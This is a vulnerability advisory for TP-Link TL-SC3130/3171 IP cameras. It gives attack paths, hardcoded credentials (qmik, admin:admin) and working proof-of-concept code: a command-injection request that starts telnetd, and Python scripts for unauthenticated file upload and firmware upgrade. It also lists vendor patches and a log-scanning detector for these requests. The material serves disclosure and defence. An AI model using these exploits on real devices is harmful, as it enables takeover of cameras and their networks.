Detailed analysis of multiple TP-Link Network Camera Vulnerabilities

Vulnerability description:
Multiple vulnerabilities were found in firmware version LM.1.6.18P12_sign5 of the TP-Link TL-SC3171 IP camera, which allow attackers to do the following:
1: [CVE-2013-2578] execute arbitrary commands via the file /cgi-bin/admin/servetest.
2: [CVE-2013-2579] execute arbitrary commands through the device shell using a hardcoded credential.
3: [CVE-2013-2580] perform an unauthenticated remote file upload.
4: [CVE-2013-2581] perform an unauthenticated firmware upgrade.
Attack path:
By combining these vulnerabilities, multiple attack paths are possible. Other attack paths exist as well, but the two described here illustrate how attackers can compromise the affected devices.
Attack Path 1:
(Authentication: none)
1: Upload a rooted firmware image using the [CVE-2013-2581] vulnerability.
2: Restart the device via http://<ip-cam>/cgi-bin/reboot.
Attack Path 2:
(Authentication: bypassed)
1: Use http://<ip-cam>/cgi-bin/hardfactorydefault to reset the device to its factory default settings. Authentication is then bypassed by using admin:admin as a valid user name and password.
2: Restart the device via http://<ip-cam>/cgi-bin/reboot.
3: Enable the Telnet service through the [CVE-2013-2578] vulnerability.
4: Log on to the Telnet service as user qmik (no password) and use the device as a pivot point.
Affected devices and firmware:

TP-Link TL-SC3130 (firmware version LM.1.6.18P12_sign5 and below)
TP-Link TL-SC3130G (firmware version LM.1.6.18P12_sign5 and below)
TP-Link TL-SC3171 (firmware version LM.1.6.18P12_sign5 and below)
TP-Link TL-SC3171G (firmware version LM.1.6.18P12_sign5 and below)
Other TP-Link network cameras and firmware versions may also be affected.
Vendor information, solutions and workarounds:
The vendor has provided beta patch firmware at the following links:
[3] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130.zip
[4] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130G.zip
[5] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171.zip
[6] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171G.zip
The final official version will be published in the coming days; please contact TP-LINK for more information.
Technical details and PoC:
1: Operating system command injection in servetest
[CVE-2013-2578] The file /cgi-bin/admin/servetest has several parameters that are vulnerable to operating system command injection, allowing authenticated users to execute arbitrary commands. The following PoC request starts the telnet service (the injected command is placed in the ServerName parameter):
GET /cgi-bin/admin/servetest?cmd=smtp&ServerName=1.1.1.1;/usr/sbin/telnetd;&ServerPort=25&ServerSSL=off&RcptToAddr1=q@q&AdminAddr=q@q HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://192.168.1.100/progress.htm
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 192.168.1.100
Proxy-Connection: Keep-Alive
Cookie: VideoFmt=1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 2

2: Hard-coded authentication in the telnet service
[CVE-2013-2579] The affected system contains a hard-coded login that requires no password, allowing remote attackers to log on to the operating system of the affected device through its built-in telnet service. The user name and password are:
username: qmik
password: (none)
The qmik user is allowed to execute the su command, which leads to arbitrary command execution with root privileges. The telnet service can be turned on via the [CVE-2013-2578] vulnerability.
3: Unauthenticated remote file upload
[CVE-2013-2580] The file /cgi-bin/uploadfile allows unauthenticated users to upload files remotely. Below is the Python PoC:
import requests

# Create a small local file to upload.
fileName = "lala.tmp"
with open(fileName, "w") as f:
    f.write("lala")

# No Authorization header is needed: the endpoint is unauthenticated.
with open(fileName, "rb") as f:
    requests.post("http://192.168.1.100/cgi-bin/uploadfile", files={fileName: f})

The uploaded file (lala.tmp in this example) is placed in the /mnt/mtd directory.
4: Unauthenticated remote firmware upgrade
[CVE-2013-2581] The file /cgi-bin/firmwareupgrade allows unauthenticated users to perform remote firmware upgrades, as shown in the Python PoC below:
import requests

# First request puts the upgrade handler into its "preset" state.
requests.get("http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset")

# Then the firmware image is posted as a multipart file, again without authentication.
fileName = "COM_T01F001_LM.1.6.18P12_sign5_TPL.TL-SC3171.bin"
cookies = {"VideoFmt": "1"}
with open(fileName, "rb") as f:
    requests.post("http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset",
                  files={"SetFWFileName": (fileName, f)}, cookies=cookies)
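As an added defensive example (not part of the advisory), the following Python scans access-log lines for the request patterns described in sections 1, 3 and 4 above: shell metacharacters in servetest parameters, and any hit on the unauthenticated uploadfile/firmwareupgrade endpoints or the reset/reboot CGIs. It assumes a Common Log Format log from a reverse proxy or IDS sitting in front of the camera; the sample lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Endpoints named in the advisory (assumed paths as written there).
INJECTABLE = {"/cgi-bin/admin/servetest"}          # authenticated OS command injection
UNAUTH_ENDPOINTS = {"/cgi-bin/uploadfile", "/cgi-bin/firmwareupgrade"}  # no auth at all
RESET_ENDPOINTS = {"/cgi-bin/hardfactorydefault", "/cgi-bin/reboot"}
# Shell metacharacters that never belong in a mail-server hostname or port.
SHELL_META = re.compile(r"[;|&`$()<>\n]")
# Common Log Format: client ident user [ts] "METHOD target HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse_query(query):
    """Split a query string on '&' only (older parse_qs also splits on ';',
    which would hide the injected ';' in the PoC)."""
    params = {}
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params

def classify(line):
    """Return a list of alert strings for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    client, user, _ts, method, target, _status = m.groups()
    path, _, query = target.partition("?")
    alerts = []
    if path in INJECTABLE:
        for name, values in parse_query(query).items():
            if any(SHELL_META.search(v) for v in values):
                alerts.append(f"servetest command injection via {name} from {client}")
    if path in UNAUTH_ENDPOINTS:
        alerts.append(f"unauthenticated {path} {method} from {client} (user={user})")
    if path in RESET_ENDPOINTS:
        alerts.append(f"reset/reboot {path} from {client}")
    return alerts

def scan(lines):
    return [a for line in lines for a in classify(line)]

# Constructed sample log lines; the second mirrors the servetest PoC above.
SAMPLE_LOG = [
    '192.168.1.50 - admin [10/Jun/2013:10:00:01 +0000] "GET /cgi-bin/admin/servetest?cmd=smtp&ServerName=mail.example.com&ServerPort=25 HTTP/1.1" 200 12',
    '10.0.0.9 - admin [10/Jun/2013:10:00:02 +0000] "GET /cgi-bin/admin/servetest?cmd=smtp&ServerName=1.1.1.1;/usr/sbin/telnetd;&ServerPort=25 HTTP/1.1" 200 12',
    '10.0.0.9 - - [10/Jun/2013:10:00:03 +0000] "POST /cgi-bin/uploadfile HTTP/1.1" 200 0',
    '10.0.0.9 - - [10/Jun/2013:10:00:04 +0000] "GET /cgi-bin/firmwareupgrade?action=preset HTTP/1.1" 200 0',
    '10.0.0.9 - - [10/Jun/2013:10:00:05 +0000] "GET /cgi-bin/hardfactorydefault HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```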
References:
[1] TP-Link TL-SC3171, http://www.tp-link.com/en/products/details?categoryid=230&model=TL-SC3171
[2] Security Analysis of IP video surveillance cameras, http://seclists.org/fulldisclosure/2013/Jun/84
[3] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130.zip
[4] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130G.zip
[5] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171.zip
[6] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171G.zip
From: http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras#other